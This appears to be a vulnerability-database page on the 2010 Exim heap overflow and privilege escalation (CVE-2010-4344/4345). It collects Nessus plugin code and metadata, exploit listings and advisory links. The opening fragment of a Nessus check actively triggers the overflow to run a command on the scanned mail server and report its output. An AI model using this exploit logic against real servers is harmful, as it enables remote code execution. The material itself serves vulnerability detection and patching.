data:'\n.\n'); # Receive the response, which should be: # 552 Message size exceeds maximum permitted response = recv_line( socket:socket, length:1024); if("552 Message size exceeds maximum permitted" >!< response) exit(1, "The Exim install listening on port "+port+" didn't reject the oversized message."); # Send another MAIL FROM. This will cause the boobytrapped ACL to be run, which in turn # causes the command to be run. send(socket:socket, data:"MAIL FROM: " + from + '\n'); # If the overflow was successful, it'll return the command_match string multiple times. # If it was unsuccessful, it'll return '250 OK' (in other words, accept the email). while(TRUE) { response = recv_line( socket:socket, length:1024); if (!response) exit(0, "The Exmin install listening on port "+port+" does not appear to be vulnerable."); if ("250 OK" >< response) exit(0, "The Exim install listening on port "+port+" is not vulnerable or has a non-standard log configuration."); if (command_match >< response) { if (report_verbosity > 0) { report = '\n' + 'Nessus was able to exploit the vulnerability to execute the command\n' + '\'' + command + '\' on the remote host, which produced the following output :\n' + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' + data_protection::sanitize_uid(output:chomp(response)) + '\n' + crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n'; security_hole(port:port, extra:report); } else security_hole(port); exit(0); } }
NASL family SuSE Local Security Checks NASL id SUSE_11_2_EXIM-101211.NASL description remote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345). last seen 2020-06-01 modified 2020-06-02 plugin id 53715 published 2011-05-05 reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/53715 title openSUSE Security Update : exim (openSUSE-SU-2010:1052-1) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update exim-3680. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(53715); script_version("1.10"); script_cvs_date("Date: 2019/10/25 13:36:38"); script_cve_id("CVE-2010-4344", "CVE-2010-4345"); script_name(english:"openSUSE Security Update : exim (openSUSE-SU-2010:1052-1)"); script_summary(english:"Check for the exim-3680 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "remote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345)." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.novell.com/show_bug.cgi?id=658731" ); script_set_attribute( attribute:"see_also", value:"https://lists.opensuse.org/opensuse-updates/2010-12/msg00029.html" ); script_set_attribute(attribute:"solution", value:"Update the affected exim packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"metasploit_name", value:'Exim4 string_format Function Heap Buffer Overflow'); script_set_attribute(attribute:"exploit_framework_metasploit", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:exim"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:eximon"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:eximstats-html"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:11.2"); script_set_attribute(attribute:"patch_publication_date", value:"2010/12/11"); script_set_attribute(attribute:"plugin_publication_date", value:"2011/05/05"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE11\.2)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "11.2", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE11.2", reference:"exim-4.69-72.6.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"eximon-4.69-72.6.1") ) flag++; if ( rpm_check(release:"SUSE11.2", reference:"eximstats-html-4.69-72.6.1") ) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "exim / eximon / eximstats-html"); }
NASL family SuSE Local Security Checks NASL id SUSE_11_1_EXIM-101211.NASL description remote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345). last seen 2020-06-01 modified 2020-06-02 plugin id 53657 published 2011-05-05 reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/53657 title openSUSE Security Update : exim (openSUSE-SU-2010:1052-1) NASL family Debian Local Security Checks NASL id DEBIAN_DSA-2131.NASL description Several vulnerabilities have been found in exim4 that allow a remote attacker to execute arbitrary code as root user. Exploits for these issues have been seen in the wild. This update fixes a memory corruption issue that allows a remote attacker to execute arbitrary code as the Debian-exim user (CVE-2010-4344 ). A fix for an additional issue that allows the Debian-exim user to obtain root privileges (CVE-2010-4345 ) is currently being checked for compatibility issues. It is not yet included in this upgrade but will released soon in an update to this advisory. last seen 2020-06-01 modified 2020-06-02 plugin id 51128 published 2010-12-12 reporter This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/51128 title Debian DSA-2131-1 : exim4 - arbitrary code execution NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2010-0970.NASL description Updated exim packages that fix one security issue are now available for Red Hat Enterprise Linux 4 and 5, and Red Hat Enterprise Linux 4.7, 5.3, and 5.4 Extended Update Support. The Red Hat Security Response Team has rated this update as having critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. Exim is a mail transport agent (MTA) developed at the University of Cambridge for use on Unix systems connected to the Internet. A buffer overflow flaw was discovered in Exim last seen 2020-06-01 modified 2020-06-02 plugin id 51780 published 2011-01-28 reporter This script is Copyright (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/51780 title CentOS 4 : exim (CESA-2010:0970) NASL family Scientific Linux Local Security Checks NASL id SL_20101210_EXIM_ON_SL4_X.NASL description A buffer overflow flaw was discovered in Exim last seen 2020-06-01 modified 2020-06-02 plugin id 60919 published 2012-08-01 reporter This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/60919 title Scientific Linux Security Update : exim on SL4.x, SL5.x i386/x86_64 NASL family SuSE Local Security Checks NASL id SUSE_11_3_EXIM-101211.NASL description remote attackers could trick exim into running arbitrary code (CVE-2010-4344). A privilege escalation flaw allowed attackers to gain root access (CVE-2010-4345). last seen 2020-06-01 modified 2020-06-02 plugin id 75481 published 2014-06-13 reporter This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/75481 title openSUSE Security Update : exim (openSUSE-SU-2010:1052-1) NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201401-32.NASL description The remote host is affected by the vulnerability described in GLSA-201401-32 (Exim: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could possibly execute arbitrary code with root privileges, or cause a Denial of Service condition. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 72159 published 2014-01-28 reporter This script is Copyright (C) 2014-2018 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/72159 title GLSA-201401-32 : Exim: Multiple vulnerabilities NASL family Ubuntu Local Security Checks NASL id UBUNTU_USN-1032-1.NASL description Sergey Kononenko and Eugene Bujak discovered that Exim did not correctly truncate string expansions. A remote attacker could send specially crafted email traffic to run arbitrary code as the Exim user, which could also lead to root privileges. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 51136 published 2010-12-12 reporter Ubuntu Security Notice (C) 2010-2019 Canonical, Inc. / NASL script (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/51136 title Ubuntu 6.06 LTS / 8.04 LTS / 9.10 : exim4 vulnerability (USN-1032-1)
Packetstorm
data source https://packetstormsecurity.com/files/download/96630/eximxpl.pl.txt id PACKETSTORM:96630 last seen 2016-12-05 published 2010-12-11 reporter Kingcope source https://packetstormsecurity.com/files/96630/Exim-4.63-Remote-Root-Exploit.html title Exim 4.63 Remote Root Exploit data source https://packetstormsecurity.com/files/download/96605/exim4_string_format.rb.txt id PACKETSTORM:96605 last seen 2016-12-05 published 2010-12-11 reporter H D Moore source https://packetstormsecurity.com/files/96605/Exim4-4.69-string_format-Function-Heap-Buffer-Overflow.html title Exim4 <= 4.69 string_format Function Heap Buffer Overflow
Redhat
advisories |
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
rpms |
|
References
- ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70
- ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70
- http://atmail.com/blog/2010/atmail-6204-now-available/
- http://atmail.com/blog/2010/atmail-6204-now-available/
- http://bugs.exim.org/show_bug.cgi?id=787
- http://bugs.exim.org/show_bug.cgi?id=787
- http://git.exim.org/exim.git/commit/24c929a27415c7cfc7126c47e4cad39acf3efa6b
- http://git.exim.org/exim.git/commit/24c929a27415c7cfc7126c47e4cad39acf3efa6b
- http://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.html
- http://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.html
- http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00003.html
- http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00003.html
- http://openwall.com/lists/oss-security/2010/12/10/1
- http://openwall.com/lists/oss-security/2010/12/10/1
- http://secunia.com/advisories/40019
- http://secunia.com/advisories/40019
- http://secunia.com/advisories/42576
- http://secunia.com/advisories/42576
- http://secunia.com/advisories/42586
- http://secunia.com/advisories/42586
- http://secunia.com/advisories/42587
- http://secunia.com/advisories/42587
- http://secunia.com/advisories/42589
- http://secunia.com/advisories/42589
- http://www.cpanel.net/2010/12/exim-remote-memory-corruption-vulnerability-notification-cve-2010-4344.html
- http://www.cpanel.net/2010/12/exim-remote-memory-corruption-vulnerability-notification-cve-2010-4344.html
- http://www.debian.org/security/2010/dsa-2131
- http://www.debian.org/security/2010/dsa-2131
- http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
- http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
- http://www.kb.cert.org/vuls/id/682457
- http://www.kb.cert.org/vuls/id/682457
- http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
- http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
- http://www.openwall.com/lists/oss-security/2021/05/04/7
- http://www.openwall.com/lists/oss-security/2021/05/04/7
- http://www.osvdb.org/69685
- http://www.osvdb.org/69685
- http://www.redhat.com/support/errata/RHSA-2010-0970.html
- http://www.redhat.com/support/errata/RHSA-2010-0970.html
- http://www.securityfocus.com/archive/1/515172/100/0/threaded
- http://www.securityfocus.com/archive/1/515172/100/0/threaded
- http://www.securityfocus.com/bid/45308
- http://www.securityfocus.com/bid/45308
- http://www.securitytracker.com/id?1024858
- http://www.securitytracker.com/id?1024858
- http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/
- http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/
- http://www.ubuntu.com/usn/USN-1032-1
- http://www.ubuntu.com/usn/USN-1032-1
- http://www.vupen.com/english/advisories/2010/3171
- http://www.vupen.com/english/advisories/2010/3171
- http://www.vupen.com/english/advisories/2010/3172
- http://www.vupen.com/english/advisories/2010/3172
- http://www.vupen.com/english/advisories/2010/3181
- http://www.vupen.com/english/advisories/2010/3181
- http://www.vupen.com/english/advisories/2010/3186
- http://www.vupen.com/english/advisories/2010/3186
- http://www.vupen.com/english/advisories/2010/3204
- http://www.vupen.com/english/advisories/2010/3204
- http://www.vupen.com/english/advisories/2010/3246
- http://www.vupen.com/english/advisories/2010/3246
- http://www.vupen.com/english/advisories/2010/3317
- http://www.vupen.com/english/advisories/2010/3317
- https://bugzilla.redhat.com/show_bug.cgi?id=661756
- https://bugzilla.redhat.com/show_bug.cgi?id=661756